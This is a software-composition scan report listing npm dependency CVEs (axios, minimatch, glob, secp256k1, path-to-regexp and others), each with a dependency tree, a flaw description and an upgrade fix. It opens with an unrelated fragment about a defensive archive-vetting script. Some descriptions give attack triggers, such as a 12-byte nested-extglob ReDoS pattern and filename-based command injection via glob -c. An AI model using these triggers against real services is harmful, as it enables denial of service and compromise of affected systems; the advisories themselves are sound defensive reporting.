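console.log(scanSampleArchive());
```

Run against the sample archive this reports four findings: the symlink, its normalization collision with `ss/`, the traversal name, and the escaping hardlink. In a real extraction pipeline the same vet step runs before the entries are handed to the extractor, which also sidesteps the ordering assumptions the race in CVE-2026-23950 depends on, since colliding and link entries never reach the filesystem at all.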

🔴CVE-2024-21505

Vulnerable Library - web3-utils-1.10.4.tgz

Library home page: https://registry.npmjs.org/web3-utils/-/web3-utils-1.10.4.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-net-1.10.4.tgz
          • web3-utils-1.10.4.tgz (Vulnerable Library)
  • chain-abstraction-1.0.4.tgz (Root Library)

    • sdk-1.11.1.tgz
      • cow-sdk-1.0.2-RC.7.tgz
        • paraswap-5.2.0.tgz
          • web3-1.10.4.tgz
            • web3-utils-1.10.4.tgz (Vulnerable Library)
  • @connext/lighthouse-2.0.0.tgz (Root Library)

    • sdk-1.0.0.tgz
      • merkletreejs-0.2.32.tgz
        • web3-utils-1.10.4.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

Versions of the package web3-utils before 4.2.1 are vulnerable to Prototype Pollution via the utility functions format and mergeDeep, due to insecure recursive merge.
An attacker can manipulate an object's prototype, potentially leading to the alteration of the behavior of all objects inheriting from the affected prototype by passing specially crafted input to these functions.

Publish Date: Mar 25, 2024 05:00 AM

URL: CVE-2024-21505

Threat Assessment

Exploit Maturity:Proof of concept

EPSS:< 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin:

Release Date:

Fix Resolution :

🔴CVE-2024-21538

Vulnerable Library - cross-spawn-7.0.3.tgz

Cross platform child_process#spawn and child_process#spawnSync

Library home page: https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • glob-10.3.10.tgz
          • foreground-child-3.1.1.tgz
            • cross-spawn-7.0.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

Versions of the package cross-spawn before 6.0.6, from 7.0.0 and before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

Publish Date: Nov 08, 2024 05:00 AM

URL: CVE-2024-21538

Threat Assessment

Exploit Maturity:Proof of concept

EPSS:< 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin: https://www.cve.org/CVERecord?id=CVE-2024-21538

Release Date: Nov 08, 2024 05:00 AM

Fix Resolution : cross-spawn - 7.0.5,org.webjars.npm:cross-spawn:6.0.6,https://github.com/moxystudio/node-cross-spawn.git - v6.0.6,https://github.com/moxystudio/node-cross-spawn.git - v7.0.5,cross-spawn - 7.0.5,cross-spawn - 6.0.6

🔴CVE-2024-37890

Vulnerable Library - ws-3.3.3.tgz

Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js

Library home page: https://registry.npmjs.org/ws/-/ws-3.3.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • ws-3.3.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

ws is an open source WebSocket client and server for Node.js. A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server. The vulnerability was fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied.

Publish Date: Jun 17, 2024 07:09 PM

URL: CVE-2024-37890

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin: GHSA-3h5v-q93c-6h6q

Release Date: Jun 17, 2024 07:09 PM

Fix Resolution : ws - 5.2.4,6.2.3,7.5.10,8.17.1

🔴CVE-2024-45296

Vulnerable Library - path-to-regexp-0.1.7.tgz

Express style path to RegExp utility

Library home page: https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.7.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • servify-0.1.12.tgz
                • express-4.18.3.tgz
                  • path-to-regexp-0.1.7.tgz (Vulnerable Library)
  • @connext/cartographer-poller-2.0.0.tgz (Root Library)

    • dd-trace-3.13.2.tgz
      • path-to-regexp-0.1.7.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

path-to-regexp turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a DoS. The bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (.). For users of 0.1, upgrade to 0.1.10. All other users should upgrade to 8.0.0.

Publish Date: Sep 09, 2024 07:07 PM

URL: CVE-2024-45296

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin: GHSA-9wv6-86v2-598j

Release Date: Sep 09, 2024 07:07 PM

Fix Resolution : path-to-regexp - 0.1.10,1.9.0,3.3.0,6.3.0,8.0.0

🔴CVE-2024-45590

Vulnerable Library - body-parser-1.20.2.tgz

Library home page: https://registry.npmjs.org/body-parser/-/body-parser-1.20.2.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • servify-0.1.12.tgz
                • express-4.18.3.tgz
                  • body-parser-1.20.2.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

body-parser is Node.js body parsing middleware. body-parser <1.20.3 is vulnerable to denial of service when url encoding is enabled. A malicious actor using a specially crafted payload could flood the server with a large number of requests, resulting in denial of service. This issue is patched in 1.20.3.

Publish Date: Sep 10, 2024 03:54 PM

URL: CVE-2024-45590

Threat Assessment

Exploit Maturity:Not Defined

EPSS:1.5%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin: GHSA-qwcr-r2fm-qrc7

Release Date: Sep 10, 2024 03:54 PM

Fix Resolution : body-parser - 1.20.3

🔴CVE-2024-48930

Vulnerable Library - secp256k1-4.0.3.tgz

This module provides native bindings to ecdsa secp256k1 functions

Library home page: https://registry.npmjs.org/secp256k1/-/secp256k1-4.0.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-3.8.2.tgz
      • ethereumjs-util-7.1.5.tgz
        • ethereum-cryptography-0.1.3.tgz
          • secp256k1-4.0.3.tgz (Vulnerable Library)
  • @connext/bridge-reference-0.0.1.tgz (Root Library)

    • wallet-sdk-3.5.4.tgz
      • web3.js-1.52.0.tgz
        • secp256k1-4.0.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

secp256k1-node is a Node.js binding for an Optimized C library for EC operations on curve secp256k1. In "elliptic"-based version, "loadUncompressedPublicKey" has a check that the public key is on the curve. Prior to versions 5.0.1, 4.0.4, and 3.8.1, however, "loadCompressedPublicKey" is missing that check. That allows the attacker to use public keys on low-cardinality curves to extract enough information to fully restore the private key from as little as 11 ECDH sessions, and very cheaply on compute power. Other operations on public keys are also affected, including e.g. "publicKeyVerify()" incorrectly returning "true" on those invalid keys, and e.g. "publicKeyTweakMul()" also returning predictable outcomes allowing to restore the tweak. Versions 5.0.1, 4.0.4, and 3.8.1 contain a fix for the issue.

Publish Date: Oct 21, 2024 03:41 PM

URL: CVE-2024-48930

Threat Assessment

Exploit Maturity: Not Defined

EPSS: < 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin:

Release Date:

Fix Resolution:

🔴CVE-2024-52798

Vulnerable Library - path-to-regexp-0.1.7.tgz

Express style path to RegExp utility

Library home page: https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.7.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • servify-0.1.12.tgz
                • express-4.18.3.tgz
                  • path-to-regexp-0.1.7.tgz (Vulnerable Library)
  • @connext/cartographer-poller-2.0.0.tgz (Root Library)
    • dd-trace-3.13.2.tgz
      • path-to-regexp-0.1.7.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

path-to-regexp turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. The regular expression that is vulnerable to backtracking can be generated in the 0.1.x release of path-to-regexp. Upgrade to 0.1.12. This vulnerability exists because of an incomplete fix for CVE-2024-45296.

Publish Date: Dec 05, 2024 10:45 PM

URL: CVE-2024-52798

Threat Assessment

Exploit Maturity: Not Defined

EPSS: < 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin: GHSA-rhx6-c78j-4q9w

Release Date: Dec 05, 2024 10:45 PM

Fix Resolution: path-to-regexp - 0.1.12

🔴CVE-2025-27152

Vulnerable Library - axios-1.3.3.tgz

Library home page: https://registry.npmjs.org/axios/-/axios-1.3.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • axios-1.3.3.tgz (Vulnerable Library)
  • @connext/nxtp-integration-2.0.0.tgz (Root Library)
    • axios-1.3.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.

Publish Date: Mar 07, 2025 03:13 PM

URL: CVE-2025-27152

Threat Assessment

Exploit Maturity: Not Defined

EPSS: < 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin: GHSA-jr5f-v2jv-69x6

Release Date: Mar 07, 2025 03:13 PM

Fix Resolution: axios - 0.30.0, axios - 1.8.2, https://github.com/axios/axios.git - v0.30.0, org.webjars.npm:axios:1.8.3, https://github.com/axios/axios.git - v1.8.2

🔴CVE-2025-27611

Vulnerable Library - base-x-3.0.9.tgz

Fast base encoding / decoding of any given alphabet

Library home page: https://registry.npmjs.org/base-x/-/base-x-3.0.9.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-eth-1.10.4.tgz
          • web3-eth-ens-1.10.4.tgz
            • content-hash-2.5.2.tgz
              • multihashes-0.4.21.tgz
                • multibase-0.7.0.tgz
                  • base-x-3.0.9.tgz (Vulnerable Library)
  • @connext/bridge-reference-0.0.1.tgz (Root Library)
    • wallet-sdk-3.5.4.tgz
      • web3.js-1.52.0.tgz
        • borsh-0.7.0.tgz
          • bs58-4.0.1.tgz
            • base-x-3.0.9.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

base-x is a base encoder and decoder of any given alphabet using bitcoin style leading zero compression. Versions 4.0.0, 5.0.0, and all prior to 3.0.11, are vulnerable to attackers potentially deceiving users into sending funds to an unintended address. This issue has been patched in versions 3.0.11, 4.0.1, and 5.0.1.

Publish Date: Apr 30, 2025 07:36 PM

URL: CVE-2025-27611

Threat Assessment

Exploit Maturity: Not Defined

EPSS: < 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin: GHSA-xq7p-g2vc-g82p

Release Date: Apr 30, 2025 07:36 PM

Fix Resolution: base-x - 3.0.11, base-x - 4.0.1, base-x - 5.0.1, https://github.com/cryptocoinjs/base-x.git - v3.0.11, https://github.com/cryptocoinjs/base-x.git - v4.0.1, https://github.com/cryptocoinjs/base-x.git - v5.0.1

🔴CVE-2025-57330

Vulnerable Library - web3-core-subscriptions-1.10.4.tgz

Library home page: https://registry.npmjs.org/web3-core-subscriptions/-/web3-core-subscriptions-1.10.4.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-shh-1.10.4.tgz
          • web3-core-subscriptions-1.10.4.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

web3-core-subscriptions is a package designed to manage web3 subscriptions. A Prototype Pollution vulnerability in the attachToObject function of web3-core-subscriptions version 1.10.4 and before allows attackers to inject properties on Object.prototype by supplying a crafted payload, causing denial of service (DoS) as the minimum consequence.

Publish Date: Sep 24, 2025 12:00 AM

URL: CVE-2025-57330

Threat Assessment

Exploit Maturity: Not Defined

EPSS: < 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin:

Release Date:

Fix Resolution:

🔴CVE-2025-58754

Vulnerable Library - axios-1.3.3.tgz

Library home page: https://registry.npmjs.org/axios/-/axios-1.3.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • axios-1.3.3.tgz (Vulnerable Library)
  • @connext/nxtp-integration-2.0.0.tgz (Root Library)
    • axios-1.3.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

Axios is a promise based HTTP client for the browser and Node.js. When Axios (starting in version 0.28.0 and prior to versions 0.30.2 and 1.12.0) runs on Node.js and is given a URL with the "data:" scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory ("Buffer"/"Blob") and returns a synthetic 200 response. This path ignores "maxContentLength" / "maxBodyLength" (which only protect HTTP responses), so an attacker can supply a very large "data:" URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested "responseType: 'stream'". Versions 0.30.2 and 1.12.0 contain a patch for the issue.

Publish Date: Sep 12, 2025 01:16 AM

URL: CVE-2025-58754

Threat Assessment

Exploit Maturity: Not Defined

EPSS: < 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin: GHSA-4hjh-wcwx-xvwj

Release Date: Sep 12, 2025 01:16 AM

Fix Resolution: https://github.com/axios/axios.git - v1.12.0, axios - 0.30.2, axios - 1.12.0

🔴CVE-2025-64756

Vulnerable Library - glob-10.3.10.tgz

Library home page: https://registry.npmjs.org/glob/-/glob-10.3.10.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • glob-10.3.10.tgz (Vulnerable Library)
  • @connext/nxtp-adapters-subgraph-2.5.0-alpha.7.tgz (Root Library)
    • client-cli-3.0.0.tgz
      • cli-0.82.35.tgz
        • rimraf-5.0.5.tgz
          • glob-10.3.10.tgz (Vulnerable Library)
  • @connext/lighthouse-2.0.0.tgz (Root Library)
    • linea-sdk-0.3.0.tgz
      • typeorm-0.3.20.tgz
        • glob-10.3.10.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: Nov 17, 2025 05:29 PM

URL: CVE-2025-64756

Threat Assessment

Exploit Maturity: Not Defined

EPSS: < 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin: GHSA-5j98-mcp5-4vw2

Release Date: Nov 17, 2025 05:29 PM

Fix Resolution: glob - 10.5.0, glob - 11.1.0, https://github.com/isaacs/node-glob.git - v10.5.0, https://github.com/isaacs/node-glob.git - v11.1.0

🔴CVE-2026-25639

Vulnerable Library - axios-1.3.3.tgz

Library home page: https://registry.npmjs.org/axios/-/axios-1.3.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • axios-1.3.3.tgz (Vulnerable Library)
  • @connext/nxtp-integration-2.0.0.tgz (Root Library)
    • axios-1.3.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing "__proto__" as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5.
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: Feb 09, 2026 08:11 PM

URL: CVE-2026-25639

Threat Assessment

Exploit Maturity: Not Defined

EPSS: < 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin: axios/axios@28c7215

Release Date: Feb 09, 2026 08:11 PM

Fix Resolution: https://github.com/axios/axios.git - v1.13.5

🔴CVE-2026-26996

Vulnerable Library - minimatch-9.0.3.tgz

Library home page: https://registry.npmjs.org/minimatch/-/minimatch-9.0.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • glob-10.3.10.tgz
          • minimatch-9.0.3.tgz (Vulnerable Library)
  • @connext/nxtp-adapters-subgraph-2.5.0-alpha.7.tgz (Root Library)
    • client-cli-3.0.0.tgz
      • cli-0.82.35.tgz
        • rimraf-5.0.5.tgz
          • glob-10.3.10.tgz
            • minimatch-9.0.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions prior to 10.2.1, 3.1.3, 4.2.4, 5.1.7, 6.2.1, 7.4.7, 8.0.5, and 9.0.6 are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS.
This issue has been fixed in versions 10.2.1, 3.1.3, 4.2.4, 5.1.7, 6.2.1, 7.4.7, 8.0.5, and 9.0.6.
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: Feb 20, 2026 03:05 AM

URL: CVE-2026-26996

Threat Assessment

Exploit Maturity: Not Defined

EPSS: < 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin: GHSA-3ppc-4f35-3m26

Release Date: Feb 19, 2026 12:56 AM

Fix Resolution: https://github.com/isaacs/minimatch.git - v3.1.3, https://github.com/isaacs/minimatch.git - v4.2.4, https://github.com/isaacs/minimatch.git - v5.1.7, https://github.com/isaacs/minimatch.git - v6.2.1, https://github.com/isaacs/minimatch.git - v7.4.7, https://github.com/isaacs/minimatch.git - v8.0.5, https://github.com/isaacs/minimatch.git - v9.0.6, https://github.com/isaacs/minimatch.git - v10.2.1

🔴CVE-2026-27903

Vulnerable Library - minimatch-9.0.3.tgz

Library home page: https://registry.npmjs.org/minimatch/-/minimatch-9.0.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • glob-10.3.10.tgz
          • minimatch-9.0.3.tgz (Vulnerable Library)
  • @connext/nxtp-adapters-subgraph-2.5.0-alpha.7.tgz (Root Library)
    • client-cli-3.0.0.tgz
      • cli-0.82.35.tgz
        • rimraf-5.0.5.tgz
          • glob-10.3.10.tgz
            • minimatch-9.0.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, "matchOne()" performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent "**" (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)), i.e. binomial, where "n" is the number of path segments and "k" is the number of globstars. With k=11 and n=30, a call to the default "minimatch()" API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to "minimatch()" is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.

Publish Date: Feb 26, 2026 01:06 AM

URL: CVE-2026-27903

Threat Assessment

Exploit Maturity: Not Defined

EPSS: < 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin: GHSA-7r86-cg39-jmmj

Release Date: Feb 26, 2026 01:06 AM

Fix Resolution: https://github.com/isaacs/minimatch.git - v3.1.3, https://github.com/isaacs/minimatch.git - v4.2.5, https://github.com/isaacs/minimatch.git - v5.1.8, https://github.com/isaacs/minimatch.git - v6.2.2, https://github.com/isaacs/minimatch.git - v7.4.8, https://github.com/isaacs/minimatch.git - v8.0.6, https://github.com/isaacs/minimatch.git - v9.0.7, https://github.com/isaacs/minimatch.git - v10.2.3

🔴CVE-2026-27904

Vulnerable Library - minimatch-9.0.3.tgz

Library home page: https://registry.npmjs.org/minimatch/-/minimatch-9.0.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • glob-10.3.10.tgz
          • minimatch-9.0.3.tgz (Vulnerable Library)
  • @connext/nxtp-adapters-subgraph-2.5.0-alpha.7.tgz (Root Library)
    • client-cli-3.0.0.tgz
      • cli-0.82.35.tgz
        • rimraf-5.0.5.tgz
          • glob-10.3.10.tgz
            • minimatch-9.0.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested "()" extglobs produce regexps with nested unbounded quantifiers (e.g. "(?:(?:a|b))"), which exhibit catastrophic backtracking in V8. With a 12-byte pattern "(((a|b)))" and an 18-byte non-matching input, "minimatch()" stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default "minimatch()" API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects "+()" extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

Publish Date: Feb 26, 2026 01:07 AM

URL: CVE-2026-27904

Threat Assessment

Exploit Maturity: Not Defined

EPSS: < 1%

Score: 7.5


Suggested Fix

Type: Upgrade version

Origin: GHSA-23c5-xmqv-rm74

Release Date: Feb 26, 2026 01:07 AM

Fix Resolution: minimatch - 3.1.4, minimatch - 4.2.5, minimatch - 5.1.8, minimatch - 6.2.2, minimatch - 7.4.8, minimatch - 8.0.6, minimatch - 9.0.7, minimatch - 10.2.3
